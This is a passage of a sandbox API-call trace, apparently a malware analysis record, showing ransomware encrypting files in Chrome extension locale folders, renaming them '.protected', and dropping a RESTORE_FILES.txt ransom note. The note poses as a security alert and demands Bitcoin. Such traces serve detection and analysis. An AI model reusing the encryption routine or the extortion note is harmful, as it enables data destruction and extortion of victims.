nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcd, lpOverlapped=0x0) returned 1 [0080.730] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.730] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcd, lpOverlapped=0x0) returned 1 [0080.730] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.730] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.730] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.730] CloseHandle (hObject=0x168) returned 1 [0080.730] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.protected") returned 165 [0080.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.protected")) returned 1 [0080.731] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.731] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.731] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0080.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.731] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.731] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.732] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.732] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.732] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.732] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.732] CloseHandle (hObject=0x164) returned 1 [0080.733] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0080.733] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0080.733] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk") returned 141 [0080.733] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0080.733] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0080.733] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\*") returned 143 [0080.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.733] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.733] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.733] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.733] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.733] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.733] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\.") returned 143 [0080.733] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.733] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.733] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.733] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.733] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.733] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.733] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\..") returned 144 [0080.733] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.733] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.733] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.733] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.734] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.734] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.734] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.734] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0080.734] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.734] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.734] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.734] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0080.734] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0080.734] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json") returned 155 [0080.734] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.734] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x115, lpOverlapped=0x0) returned 1 [0080.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.735] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x115, lpOverlapped=0x0) returned 1 [0080.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.736] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.736] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.736] CloseHandle (hObject=0x168) returned 1 [0080.736] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.protected") returned 165 [0080.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.protected")) returned 1 [0080.737] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.737] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.737] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0080.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.737] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.737] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.738] lstrlenA (lpString="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") returned 684 [0080.738] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.738] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.738] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.738] CloseHandle (hObject=0x164) returned 1 [0080.738] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="Windows") returned -1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="Program Files") returned 1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="Program Files (x86)") returned 1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="$Recycle.bin") returned 1 [0080.738] lstrcmpiW (lpString1="ur", lpString2="System Volume Information") returned 1 [0080.738] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur") returned 141 [0080.738] lstrcmpW (lpString1="ur", lpString2=".") returned 1 [0080.738] lstrcmpW (lpString1="ur", lpString2="..") returned 1 [0080.738] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\*") returned 143 [0080.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.739] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.739] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.739] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.739] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.739] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.739] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\.") returned 143 [0080.739] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.739] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.739] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.739] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.739] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.739] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.739] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.739] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\..") returned 144 [0080.739] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.739] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0080.739] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.739] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.739] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0080.739] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.739] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.739] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.739] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0080.740] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.740] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0080.740] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json") returned 155 [0080.740] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.740] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x177, lpOverlapped=0x0) returned 1 [0080.741] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe89, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.741] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x177, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x177, lpOverlapped=0x0) returned 1 [0080.741] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.741] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.741] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.741] CloseHandle (hObject=0x168) returned 1 [0080.741] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 